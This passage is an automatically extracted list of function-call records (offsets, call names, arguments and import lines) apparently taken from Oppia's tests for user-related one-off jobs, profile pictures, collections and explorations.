core.domain import user_services\n'), ((43736, 43791), 'core.domain.user_services.get_weekly_dashboard_stats', 'user_services.get_weekly_dashboard_stats', (['self.owner_id'], {}), '(self.owner_id)\n', (43776, 43791), False, 'from core.domain import user_services\n'), ((44381, 44431), 'core.domain.user_services.get_user_actions_info', 'user_services.get_user_actions_info', (['self.admin_id'], {}), '(self.admin_id)\n', (44416, 44431), False, 'from core.domain import user_services\n'), ((44583, 44633), 'core.domain.user_services.get_user_actions_info', 'user_services.get_user_actions_info', (['self.owner_id'], {}), '(self.owner_id)\n', (44618, 44633), False, 'from core.domain import user_services\n'), ((45093, 45158), 'core.domain.user_jobs_one_off.UserFirstContributionMsecOneOffJob.create_new', 'user_jobs_one_off.UserFirstContributionMsecOneOffJob.create_new', ([], {}), '()\n', (45156, 45158), False, 'from core.domain import user_jobs_one_off\n'), ((45168, 45236), 'core.domain.user_jobs_one_off.UserFirstContributionMsecOneOffJob.enqueue', 'user_jobs_one_off.UserFirstContributionMsecOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (45228, 45236), False, 'from core.domain import user_jobs_one_off\n'), ((45532, 45619), 'core.domain.exp_services.publish_exploration_and_update_user_profiles', 'exp_services.publish_exploration_and_update_user_profiles', (['self.admin', 'self.EXP_ID'], {}), '(self.admin, self.\n EXP_ID)\n', (45589, 45619), False, 'from core.domain import exp_services\n'), ((45636, 45708), 'core.domain.rights_manager.release_ownership_of_exploration', 'rights_manager.release_ownership_of_exploration', (['self.admin', 'self.EXP_ID'], {}), '(self.admin, self.EXP_ID)\n', (45683, 45708), False, 'from core.domain import rights_manager\n'), ((46632, 46697), 'core.domain.user_jobs_one_off.UserFirstContributionMsecOneOffJob.create_new', 'user_jobs_one_off.UserFirstContributionMsecOneOffJob.create_new', ([], {}), '()\n', (46695, 46697), False, 'from core.domain import user_jobs_one_off\n'), ((46707, 46775), 'core.domain.user_jobs_one_off.UserFirstContributionMsecOneOffJob.enqueue', 'user_jobs_one_off.UserFirstContributionMsecOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (46767, 46775), False, 'from core.domain import user_jobs_one_off\n'), ((47269, 47356), 'core.domain.exp_services.publish_exploration_and_update_user_profiles', 'exp_services.publish_exploration_and_update_user_profiles', (['self.owner', 'self.EXP_ID'], {}), '(self.owner, self.\n EXP_ID)\n', (47326, 47356), False, 'from core.domain import exp_services\n'), ((47788, 47849), 'core.domain.rights_manager.unpublish_exploration', 'rights_manager.unpublish_exploration', (['self.admin', 'self.EXP_ID'], {}), '(self.admin, self.EXP_ID)\n', (47824, 47849), False, 'from core.domain import rights_manager\n'), ((47977, 48042), 'core.domain.user_jobs_one_off.UserFirstContributionMsecOneOffJob.create_new', 'user_jobs_one_off.UserFirstContributionMsecOneOffJob.create_new', ([], {}), '()\n', (48040, 48042), False, 'from core.domain import user_jobs_one_off\n'), ((48052, 48120), 'core.domain.user_jobs_one_off.UserFirstContributionMsecOneOffJob.enqueue', 'user_jobs_one_off.UserFirstContributionMsecOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (48112, 48120), False, 'from core.domain import user_jobs_one_off\n'), ((48730, 48795), 'core.domain.user_jobs_one_off.UserFirstContributionMsecOneOffJob.create_new', 'user_jobs_one_off.UserFirstContributionMsecOneOffJob.create_new', ([], {}), '()\n', (48793, 48795), False, 'from core.domain import user_jobs_one_off\n'), ((48805, 48873), 'core.domain.user_jobs_one_off.UserFirstContributionMsecOneOffJob.enqueue', 'user_jobs_one_off.UserFirstContributionMsecOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (48865, 48873), False, 'from core.domain import user_jobs_one_off\n'), ((49615, 49682), 'core.domain.user_jobs_one_off.UserLastExplorationActivityOneOffJob.create_new', 'user_jobs_one_off.UserLastExplorationActivityOneOffJob.create_new', ([], {}), '()\n', (49680, 49682), False, 'from core.domain import user_jobs_one_off\n'), ((49692, 49762), 'core.domain.user_jobs_one_off.UserLastExplorationActivityOneOffJob.enqueue', 'user_jobs_one_off.UserLastExplorationActivityOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (49754, 49762), False, 'from core.domain import user_jobs_one_off\n'), ((50372, 50418), 'core.domain.user_services.get_user_settings', 'user_services.get_user_settings', (['self.owner_id'], {}), '(self.owner_id)\n', (50403, 50418), False, 'from core.domain import user_services\n'), ((50617, 50663), 'core.domain.user_services.get_user_settings', 'user_services.get_user_settings', (['self.owner_id'], {}), '(self.owner_id)\n', (50648, 50663), False, 'from core.domain import user_services\n'), ((51567, 51614), 'core.domain.user_services.get_user_settings', 'user_services.get_user_settings', (['self.editor_id'], {}), '(self.editor_id)\n', (51598, 51614), False, 'from core.domain import user_services\n'), ((51817, 51864), 'core.domain.user_services.get_user_settings', 'user_services.get_user_settings', (['self.editor_id'], {}), '(self.editor_id)\n', (51848, 51864), False, 'from core.domain import user_services\n'), ((53283, 53329), 'core.domain.user_services.get_user_settings', 'user_services.get_user_settings', (['self.owner_id'], {}), '(self.owner_id)\n', (53314, 53329), False, 'from core.domain import user_services\n'), ((53356, 53403), 'core.domain.user_services.get_user_settings', 'user_services.get_user_settings', (['self.editor_id'], {}), '(self.editor_id)\n', (53387, 53403), False, 'from core.domain import user_services\n'), ((53744, 53790), 'core.domain.user_services.get_user_settings', 'user_services.get_user_settings', (['self.owner_id'], {}), '(self.owner_id)\n', (53775, 53790), False, 'from core.domain import user_services\n'), ((53817, 53864), 'core.domain.user_services.get_user_settings', 'user_services.get_user_settings', (['self.editor_id'], {}), '(self.editor_id)\n', (53848, 53864), False, 'from core.domain import user_services\n'), ((54463, 54509), 'core.domain.user_services.get_user_settings', 'user_services.get_user_settings', (['self.owner_id'], {}), '(self.owner_id)\n', (54494, 54509), False, 'from core.domain import user_services\n'), ((54709, 54755), 'core.domain.user_services.get_user_settings', 'user_services.get_user_settings', (['self.owner_id'], {}), '(self.owner_id)\n', (54740, 54755), False, 'from core.domain import user_services\n'), ((55319, 55369), 'core.domain.user_services.get_user_actions_info', 'user_services.get_user_actions_info', (['self.owner_id'], {}), '(self.owner_id)\n', (55354, 55369), False, 'from core.domain import user_services\n'), ((56000, 56021), 'python_utils.RANGE', 'python_utils.RANGE', (['(3)'], {}), '(3)\n', (56018, 56021), False, 'import python_utils\n'), ((58606, 58663), 'core.domain.user_jobs_one_off.RemoveActivityIDsOneOffJob.create_new', 'user_jobs_one_off.RemoveActivityIDsOneOffJob.create_new', ([], {}), '()\n', (58661, 58663), False, 'from core.domain import user_jobs_one_off\n'), ((58673, 58733), 'core.domain.user_jobs_one_off.RemoveActivityIDsOneOffJob.enqueue', 'user_jobs_one_off.RemoveActivityIDsOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (58725, 58733), False, 'from core.domain import user_jobs_one_off\n'), ((58976, 59039), 'core.domain.user_jobs_one_off.RemoveActivityIDsOneOffJob.get_output', 'user_jobs_one_off.RemoveActivityIDsOneOffJob.get_output', (['job_id'], {}), '(job_id)\n', (59031, 59039), False, 'from core.domain import user_jobs_one_off\n'), ((64281, 64344), 'core.domain.user_jobs_one_off.RemoveFeedbackThreadIDsOneOffJob.create_new', 'user_jobs_one_off.RemoveFeedbackThreadIDsOneOffJob.create_new', ([], {}), '()\n', (64342, 64344), False, 'from core.domain import user_jobs_one_off\n'), ((64354, 64420), 'core.domain.user_jobs_one_off.RemoveFeedbackThreadIDsOneOffJob.enqueue', 'user_jobs_one_off.RemoveFeedbackThreadIDsOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (64412, 64420), False, 'from core.domain import user_jobs_one_off\n'), ((64663, 64732), 'core.domain.user_jobs_one_off.RemoveFeedbackThreadIDsOneOffJob.get_output', 'user_jobs_one_off.RemoveFeedbackThreadIDsOneOffJob.get_output', (['job_id'], {}), '(job_id)\n', (64724, 64732), False, 'from core.domain import user_jobs_one_off\n'), ((68367, 68431), 'core.domain.user_jobs_one_off.FixUserSettingsCreatedOnOneOffJob.create_new', 'user_jobs_one_off.FixUserSettingsCreatedOnOneOffJob.create_new', ([], {}), '()\n', (68429, 68431), False, 'from core.domain import user_jobs_one_off\n'), ((68441, 68508), 'core.domain.user_jobs_one_off.FixUserSettingsCreatedOnOneOffJob.enqueue', 'user_jobs_one_off.FixUserSettingsCreatedOnOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (68500, 68508), False, 'from core.domain import user_jobs_one_off\n'), ((68751, 68821), 'core.domain.user_jobs_one_off.FixUserSettingsCreatedOnOneOffJob.get_output', 'user_jobs_one_off.FixUserSettingsCreatedOnOneOffJob.get_output', (['job_id'], {}), '(job_id)\n', (68813, 68821), False, 'from core.domain import user_jobs_one_off\n'), ((77227, 77255), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(10)'}), '(hours=10)\n', (77245, 77255), False, 'import datetime\n'), ((79459, 79487), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(10)'}), '(hours=10)\n', (79477, 79487), False, 'import datetime\n'), ((79865, 79892), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(5)'}), '(hours=5)\n', (79883, 79892), False, 'import datetime\n'), ((84522, 84588), 'core.domain.user_jobs_one_off.UserSettingsCreatedOnAuditOneOffJob.create_new', 'user_jobs_one_off.UserSettingsCreatedOnAuditOneOffJob.create_new', ([], {}), '()\n', (84586, 84588), False, 'from core.domain import user_jobs_one_off\n'), ((84598, 84667), 'core.domain.user_jobs_one_off.UserSettingsCreatedOnAuditOneOffJob.enqueue', 'user_jobs_one_off.UserSettingsCreatedOnAuditOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (84659, 84667), False, 'from core.domain import user_jobs_one_off\n'), ((84910, 84982), 'core.domain.user_jobs_one_off.UserSettingsCreatedOnAuditOneOffJob.get_output', 'user_jobs_one_off.UserSettingsCreatedOnAuditOneOffJob.get_output', (['job_id'], {}), '(job_id)\n', (84974, 84982), False, 'from core.domain import user_jobs_one_off\n'), ((85717, 85746), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(5)'}), '(minutes=5)\n', (85735, 85746), False, 'import datetime\n'), ((86280, 86309), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(6)'}), '(minutes=6)\n', (86298, 86309), False, 'import datetime\n'), ((87313, 87341), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(10)'}), '(hours=10)\n', (87331, 87341), False, 'import datetime\n'), ((88130, 88201), 'core.domain.subscription_services.subscribe_to_creator', 'subscription_services.subscribe_to_creator', (['self.user_id', 'self.owner_id'], {}), '(self.user_id, self.owner_id)\n', (88172, 88201), False, 'from core.domain import subscription_services\n'), ((88432, 88499), 'core.domain.user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.create_new', 'user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.create_new', ([], {}), '()\n', (88497, 88499), False, 'from core.domain import user_jobs_one_off\n'), ((88509, 88579), 'core.domain.user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.enqueue', 'user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (88571, 88579), False, 'from core.domain import user_jobs_one_off\n'), ((88669, 88742), 'core.domain.user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.get_output', 'user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.get_output', (['job_id'], {}), '(job_id)\n', (88734, 88742), False, 'from core.domain import user_jobs_one_off\n'), ((89075, 89142), 'core.domain.user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.create_new', 'user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.create_new', ([], {}), '()\n', (89140, 89142), False, 'from core.domain import user_jobs_one_off\n'), ((89152, 89222), 'core.domain.user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.enqueue', 'user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (89214, 89222), False, 'from core.domain import user_jobs_one_off\n'), ((89312, 89385), 'core.domain.user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.get_output', 'user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.get_output', (['job_id'], {}), '(job_id)\n', (89377, 89385), False, 'from core.domain import user_jobs_one_off\n'), ((89680, 89747), 'core.domain.user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.create_new', 'user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.create_new', ([], {}), '()\n', (89745, 89747), False, 'from core.domain import user_jobs_one_off\n'), ((89757, 89827), 'core.domain.user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.enqueue', 'user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (89819, 89827), False, 'from core.domain import user_jobs_one_off\n'), ((89917, 89990), 'core.domain.user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.get_output', 'user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.get_output', (['job_id'], {}), '(job_id)\n', (89982, 89990), False, 'from core.domain import user_jobs_one_off\n'), ((90809, 90859), 'core.domain.user_services.get_user_actions_info', 'user_services.get_user_actions_info', (['self.owner_id'], {}), '(self.owner_id)\n', (90844, 90859), False, 'from core.domain import user_services\n'), ((91094, 91155), 'core.domain.collection_domain.Collection.create_default_collection', 'collection_domain.Collection.create_default_collection', (['"""col"""'], {}), "('col')\n", (91148, 91155), False, 'from core.domain import collection_domain\n'), ((91385, 91451), 'core.domain.collection_services.save_new_collection', 'collection_services.save_new_collection', (['self.owner_id', 'collection'], {}), '(self.owner_id, collection)\n', (91424, 91451), False, 'from core.domain import collection_services\n'), ((91460, 91512), 'core.domain.rights_manager.publish_collection', 'rights_manager.publish_collection', (['self.owner', '"""col"""'], {}), "(self.owner, 'col')\n", (91493, 91512), False, 'from core.domain import rights_manager\n'), ((91630, 91704), 'core.domain.learner_progress_services.mark_exploration_as_completed', 'learner_progress_services.mark_exploration_as_completed', (['self.user_id', '"""0"""'], {}), "(self.user_id, '0')\n", (91685, 91704), False, 'from core.domain import learner_progress_services\n'), ((91726, 91824), 'core.domain.collection_services.record_played_exploration_in_collection_context', 'collection_services.record_played_exploration_in_collection_context', (['self.user_id', '"""col"""', '"""0"""'], {}), "(self.\n user_id, 'col', '0')\n", (91793, 91824), False, 'from core.domain import collection_services\n'), ((91841, 91915), 'core.domain.learner_progress_services.mark_exploration_as_completed', 'learner_progress_services.mark_exploration_as_completed', (['self.user_id', '"""1"""'], {}), "(self.user_id, '1')\n", (91896, 91915), False, 'from core.domain import learner_progress_services\n'), ((91937, 92035), 'core.domain.collection_services.record_played_exploration_in_collection_context', 'collection_services.record_played_exploration_in_collection_context', (['self.user_id', '"""col"""', '"""1"""'], {}), "(self.\n user_id, 'col', '1')\n", (92004, 92035), False, 'from core.domain import collection_services\n'), ((92287, 92357), 'core.domain.user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.create_new', 'user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.create_new', ([], {}), '()\n', (92355, 92357), False, 'from core.domain import user_jobs_one_off\n'), ((92380, 92453), 'core.domain.user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.enqueue', 'user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (92445, 92453), False, 'from core.domain import user_jobs_one_off\n'), ((92556, 92632), 'core.domain.user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.get_output', 'user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.get_output', (['job_id'], {}), '(job_id)\n', (92624, 92632), False, 'from core.domain import user_jobs_one_off\n'), ((93053, 93123), 'core.domain.user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.create_new', 'user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.create_new', ([], {}), '()\n', (93121, 93123), False, 'from core.domain import user_jobs_one_off\n'), ((93146, 93219), 'core.domain.user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.enqueue', 'user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (93211, 93219), False, 'from core.domain import user_jobs_one_off\n'), ((93322, 93398), 'core.domain.user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.get_output', 'user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.get_output', (['job_id'], {}), '(job_id)\n', (93390, 93398), False, 'from core.domain import user_jobs_one_off\n'), ((94105, 94175), 'core.domain.user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.create_new', 'user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.create_new', ([], {}), '()\n', (94173, 94175), False, 'from core.domain import user_jobs_one_off\n'), ((94198, 94271), 'core.domain.user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.enqueue', 'user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (94263, 94271), False, 'from core.domain import user_jobs_one_off\n'), ((94374, 94450), 'core.domain.user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.get_output', 'user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.get_output', (['job_id'], {}), '(job_id)\n', (94442, 94450), False, 'from core.domain import user_jobs_one_off\n'), ((95873, 95943), 'core.domain.user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.create_new', 'user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.create_new', ([], {}), '()\n', (95941, 95943), False, 'from core.domain import user_jobs_one_off\n'), ((95966, 96039), 'core.domain.user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.enqueue', 'user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (96031, 96039), False, 'from core.domain import user_jobs_one_off\n'), ((96142, 96218), 'core.domain.user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.get_output', 'user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.get_output', (['job_id'], {}), '(job_id)\n', (96210, 96218), False, 'from core.domain import user_jobs_one_off\n'), ((96810, 96884), 'core.domain.learner_progress_services.mark_exploration_as_completed', 'learner_progress_services.mark_exploration_as_completed', (['self.user_id', '"""2"""'], {}), "(self.user_id, '2')\n", (96865, 96884), False, 'from core.domain import learner_progress_services\n'), ((97605, 97675), 'core.domain.user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.create_new', 'user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.create_new', ([], {}), '()\n', (97673, 97675), False, 'from core.domain import user_jobs_one_off\n'), ((97698, 97771), 'core.domain.user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.enqueue', 'user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (97763, 97771), False, 'from core.domain import user_jobs_one_off\n'), ((97874, 97950), 'core.domain.user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.get_output', 'user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.get_output', (['job_id'], {}), '(job_id)\n', (97942, 97950), False, 'from core.domain import user_jobs_one_off\n'), ((98882, 98932), 'core.domain.user_services.get_user_actions_info', 'user_services.get_user_actions_info', (['self.owner_id'], {}), '(self.owner_id)\n', (98917, 98932), False, 'from core.domain import user_services\n'), ((98953, 99002), 'core.domain.user_services.get_user_actions_info', 'user_services.get_user_actions_info', (['self.user_id'], {}), '(self.user_id)\n', (98988, 99002), False, 'from core.domain import user_services\n'), ((99488, 99541), 'core.domain.rights_manager.publish_exploration', 'rights_manager.publish_exploration', (['self.user', '"""exp0"""'], {}), "(self.user, 'exp0')\n", (99522, 99541), False, 'from core.domain import rights_manager\n'), ((99550, 99604), 'core.domain.rights_manager.publish_exploration', 'rights_manager.publish_exploration', (['self.owner', '"""exp1"""'], {}), "(self.owner, 'exp1')\n", (99584, 99604), False, 'from core.domain import rights_manager\n'), ((99734, 99803), 'core.domain.user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.create_new', 'user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.create_new', ([], {}), '()\n', (99801, 99803), False, 'from core.domain import user_jobs_one_off\n'), ((99826, 99898), 'core.domain.user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.enqueue', 'user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (99890, 99898), False, 'from core.domain import user_jobs_one_off\n'), ((99988, 100063), 'core.domain.user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.get_output', 'user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.get_output', (['job_id'], {}), '(job_id)\n', (100055, 100063), False, 'from core.domain import user_jobs_one_off\n'), ((100930, 100983), 'core.domain.exp_services.delete_exploration', 'exp_services.delete_exploration', (['self.user_id', '"""exp0"""'], {}), "(self.user_id, 'exp0')\n", (100961, 100983), False, 'from core.domain import exp_services\n'), ((101015, 101084), 'core.domain.user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.create_new', 'user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.create_new', ([], {}), '()\n', (101082, 101084), False, 'from core.domain import user_jobs_one_off\n'), ((101107, 101179), 'core.domain.user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.enqueue', 'user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (101171, 101179), False, 'from core.domain import user_jobs_one_off\n'), ((101269, 101344), 'core.domain.user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.get_output', 'user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.get_output', (['job_id'], {}), '(job_id)\n', (101336, 101344), False, 'from core.domain import user_jobs_one_off\n'), ((101479, 101532), 'core.domain.exp_services.delete_exploration', 'exp_services.delete_exploration', (['self.user_id', '"""exp0"""'], {}), "(self.user_id, 'exp0')\n", (101510, 101532), False, 'from core.domain import exp_services\n'), ((102105, 102174), 'core.domain.user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.create_new', 'user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.create_new', ([], {}), '()\n', (102172, 102174), False, 'from core.domain import user_jobs_one_off\n'), ((102197, 102269), 'core.domain.user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.enqueue', 'user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (102261, 102269), False, 'from core.domain import user_jobs_one_off\n'), ((102359, 102434), 'core.domain.user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.get_output', 'user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.get_output', (['job_id'], {}), '(job_id)\n', (102426, 102434), False, 'from core.domain import user_jobs_one_off\n'), ((103293, 103347), 'core.domain.exp_services.delete_exploration', 'exp_services.delete_exploration', (['self.owner_id', '"""exp1"""'], {}), "(self.owner_id, 'exp1')\n", (103324, 103347), False, 'from core.domain import exp_services\n'), ((103920, 103989), 'core.domain.user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.create_new', 'user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.create_new', ([], {}), '()\n', (103987, 103989), False, 'from core.domain import user_jobs_one_off\n'), ((104012, 104084), 'core.domain.user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.enqueue', 'user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (104076, 104084), False, 'from core.domain import user_jobs_one_off\n'), ((104174, 104249), 'core.domain.user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.get_output', 'user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.get_output', (['job_id'], {}), '(job_id)\n', (104241, 104249), False, 'from core.domain import user_jobs_one_off\n'), ((105464, 105523), 'core.domain.user_jobs_one_off.ProfilePictureAuditOneOffJob.create_new', 'user_jobs_one_off.ProfilePictureAuditOneOffJob.create_new', ([], {}), '()\n', (105521, 105523), False, 'from core.domain import user_jobs_one_off\n'), ((105532, 105594), 'core.domain.user_jobs_one_off.ProfilePictureAuditOneOffJob.enqueue', 'user_jobs_one_off.ProfilePictureAuditOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (105586, 105594), False, 'from core.domain import user_jobs_one_off\n'), ((105837, 105902), 'core.domain.user_jobs_one_off.ProfilePictureAuditOneOffJob.get_output', 'user_jobs_one_off.ProfilePictureAuditOneOffJob.get_output', (['job_id'], {}), '(job_id)\n', (105894, 105902), False, 'from core.domain import user_jobs_one_off\n'), ((106278, 106339), 'core.domain.user_services.generate_initial_profile_picture', 'user_services.generate_initial_profile_picture', (['self.owner_id'], {}), '(self.owner_id)\n', (106324, 106339), False, 'from core.domain import user_services\n'), ((106411, 106472), 'core.domain.user_services.generate_initial_profile_picture', 'user_services.generate_initial_profile_picture', (['self.owner_id'], {}), '(self.owner_id)\n', (106457, 106472), False, 'from core.domain import user_services\n'), ((106671, 106786), 'core.domain.user_services.update_profile_picture_data_url', 'user_services.update_profile_picture_data_url', (['self.owner_id', 'image_constants.PNG_IMAGE_WRONG_DIMENSIONS_BASE64'], {}), '(self.owner_id,\n image_constants.PNG_IMAGE_WRONG_DIMENSIONS_BASE64)\n', (106716, 106786), False, 'from core.domain import user_services\n'), ((107113, 107218), 'core.domain.user_services.update_profile_picture_data_url', 'user_services.update_profile_picture_data_url', (['self.owner_id', 'image_constants.PNG_IMAGE_BROKEN_BASE64'], {}), '(self.owner_id,\n image_constants.PNG_IMAGE_BROKEN_BASE64)\n', (107158, 107218), False, 'from core.domain import user_services\n'), ((107481, 107579), 'core.domain.user_services.update_profile_picture_data_url', 'user_services.update_profile_picture_data_url', (['self.owner_id', 'image_constants.JPG_IMAGE_BASE64'], {}), '(self.owner_id,\n image_constants.JPG_IMAGE_BASE64)\n', (107526, 107579), False, 'from core.domain import user_services\n'), ((107869, 107964), 'core.domain.user_services.update_profile_picture_data_url', 'user_services.update_profile_picture_data_url', (['self.owner_id', 'image_constants.BROKEN_BASE64'], {}), '(self.owner_id,\n image_constants.BROKEN_BASE64)\n', (107914, 107964), False, 'from core.domain import user_services\n'), ((108306, 108372), 'core.domain.user_services.update_profile_picture_data_url', 'user_services.update_profile_picture_data_url', (['self.owner_id', 'None'], {}), '(self.owner_id, None)\n', (108351, 108372), False, 'from core.domain import user_services\n'), ((109984, 110081), 'core.domain.user_services.update_profile_picture_data_url', 'user_services.update_profile_picture_data_url', (['new_user_id', 'image_constants.JPG_IMAGE_BASE64'], {}), '(new_user_id, image_constants.\n JPG_IMAGE_BASE64)\n', (110029, 110081), False, 'from core.domain import user_services\n'), ((110098, 110160), 'core.domain.user_services.update_profile_picture_data_url', 'user_services.update_profile_picture_data_url', (['editor_id', 'None'], {}), '(editor_id, None)\n', (110143, 110160), False, 'from core.domain import user_services\n'), ((110990, 111059), 'core.domain.user_jobs_one_off.UniqueHashedNormalizedUsernameAuditJob.create_new', 'user_jobs_one_off.UniqueHashedNormalizedUsernameAuditJob.create_new', ([], {}), '()\n', (111057, 111059), False, 'from core.domain import user_jobs_one_off\n'), ((111082, 111154), 'core.domain.user_jobs_one_off.UniqueHashedNormalizedUsernameAuditJob.enqueue', 'user_jobs_one_off.UniqueHashedNormalizedUsernameAuditJob.enqueue', (['job_id'], {}), '(job_id)\n', (111146, 111154), False, 'from core.domain import user_jobs_one_off\n'), ((111397, 111472), 'core.domain.user_jobs_one_off.UniqueHashedNormalizedUsernameAuditJob.get_output', 'user_jobs_one_off.UniqueHashedNormalizedUsernameAuditJob.get_output', (['job_id'], {}), '(job_id)\n', (111464, 111472), False, 'from core.domain import user_jobs_one_off\n'), ((112174, 112195), 'python_utils.RANGE', 'python_utils.RANGE', (['(4)'], {}), '(4)\n', (112192, 112195), False, 'import python_utils\n'), ((112658, 112679), 'python_utils.RANGE', 'python_utils.RANGE', (['(4)'], {}), '(4)\n', (112676, 112679), False, 'import python_utils\n'), ((113506, 113527), 'python_utils.RANGE', 'python_utils.RANGE', (['(5)'], {}), '(5)\n', (113524, 113527), False, 'import python_utils\n'), ((114912, 114968), 'core.domain.user_jobs_one_off.DiscardOldDraftsOneOffJob.create_new', 'user_jobs_one_off.DiscardOldDraftsOneOffJob.create_new', ([], {}), '()\n', (114966, 114968), False, 'from core.domain import user_jobs_one_off\n'), ((114977, 115036), 'core.domain.user_jobs_one_off.DiscardOldDraftsOneOffJob.enqueue', 'user_jobs_one_off.DiscardOldDraftsOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (115028, 115036), False, 'from core.domain import user_jobs_one_off\n'), ((115119, 115181), 'core.domain.user_jobs_one_off.DiscardOldDraftsOneOffJob.get_output', 'user_jobs_one_off.DiscardOldDraftsOneOffJob.get_output', (['job_id'], {}), '(job_id)\n', (115173, 115181), False, 'from core.domain import user_jobs_one_off\n'), ((116582, 116640), 'core.domain.exp_services.delete_exploration', 'exp_services.delete_exploration', (['self.USER_ID', 'self.EXP_ID'], {}), '(self.USER_ID, self.EXP_ID)\n', (116613, 116640), False, 'from core.domain import exp_services\n'), ((9073, 9117), 're.findall', 're.findall', (['"""\\\\d+"""', 'stringified_distribution'], {}), "('\\\\d+', stringified_distribution)\n", (9083, 9117), False, 'import re\n'), ((13698, 13732), 'ast.literal_eval', 'ast.literal_eval', (['stringified_item'], {}), '(stringified_item)\n', (13714, 13732), False, 'import ast\n'), ((19962, 20063), 'core.domain.feedback_services.create_thread', 'feedback_services.create_thread', (['"""exploration"""', 'self.EXP_ID_1', 'self.user_b_id', '"""subject"""', '"""text"""'], {}), "('exploration', self.EXP_ID_1, self.\n user_b_id, 'subject', 'text')\n", (19993, 20063), False, 'from core.domain import feedback_services\n'), ((20248, 20336), 'core.domain.feedback_services.create_message', 'feedback_services.create_message', (['thread_id', 'self.user_c_id', 